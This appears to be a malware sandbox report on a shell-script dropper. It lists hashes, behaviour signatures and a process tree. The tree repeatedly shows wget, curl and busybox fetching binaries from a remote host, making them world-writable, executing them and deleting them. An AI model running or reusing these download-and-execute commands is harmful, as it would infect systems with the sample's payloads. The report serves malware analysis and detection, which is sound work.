Analysis
-
max time kernel
75s -
max time network
77s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipsel image:debian9-mipsel-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh
-
Size
10KB
-
MD5
465a5e1c3b12b954a80ce46b66ed1dfc
-
SHA1
2d79f93f29bc375e1e047f7f87bd0e015e297011
-
SHA256
53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534
-
SHA512
918aaea5078e2ee2f65ce4cf616f99eb0dd9338d62f18dc90cec672e3e55695f689f24995bcae642021415213bdfdbc597c2b63f078ce7562fd91ae4cc0faa09
-
SSDEEP
96:YPjVlIrIHIB2PW6zPRg3LyUpBUL5lPVLs3sLsFWOBLj/R3LHLttULfqfifhnW6aX:oFrL9GNAN+zXUDxcCzXIZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh/tmp/53c975f02338874d76ba52f3408b54c0a277ff44a0734c5e99c62d929d6c7534.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b./nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy./hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:768
-
-
/bin/chmodchmod 777 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU./Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:777
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:778
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:794
-
-
/bin/chmodchmod 777 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy./EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:807
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I./5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:828
-
-
/bin/chmodchmod 777 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu./3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵PID:840
-
-
/bin/chmodchmod 777 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI./RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:847
-
-
/bin/rmrm RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:868
-
-
/bin/chmodchmod 777 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA./PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW./4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s./MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:896
-
-
/bin/chmodchmod 777 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR./yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG./Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer./WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA./ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:925
-
-
/bin/chmodchmod 777 hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy./hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm hDKuy9WxCvkZuHE009JstUfsFt5F8LJLzy2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU./Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm Ni29Prpvb1azwvJoYm8xiZbcnyv9pu7KFU2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy./EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm EYVr5FoOtl6chB3Srafztjtxj6Q2LlXLmy2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I./5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 5HCw8agUABcswUSMjwMvbIuMhplOaYYO6I2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu./3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 3Nezawc4R5ewdoXcHXbUlcXvnpdW1jpOpu2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI./RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:962
-
-
/bin/rmrm RadHlbIPIIN1pRIPhM07bOifrGxY2rZTnI2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:967
-
-
/bin/chmodchmod 777 yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR./yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:969
-
-
/bin/rmrm yl6zAlhmXj70XJUaDaiP6cs8C7E4ALB3DR2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:974
-
-
/bin/chmodchmod 777 Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG./Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm Rrrh8e2Kc9RYQe64HS8TxhPxP3SyANk8hG2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer./WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm WIk3LA9SpXqSSIGP71jeZsx0ucFlzCNJer2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA./ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm ecsSN86G0JtiaUBcJAPDdl8vahpduOPESA2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA./PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm PjqqIx8g7mCKgqfRSahIId1NpARXsyXtOA2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW./4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 4VqWJn5dYWs9Z88QU6dt4wizyvrxdfSMCW2⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s./MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm MGnktBtnHKriEwkEOkj9vcGpHQYef2an7s2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 nWBsz22rKl7aCgUqX7xu0cR8U0Xmmnr45b2⤵
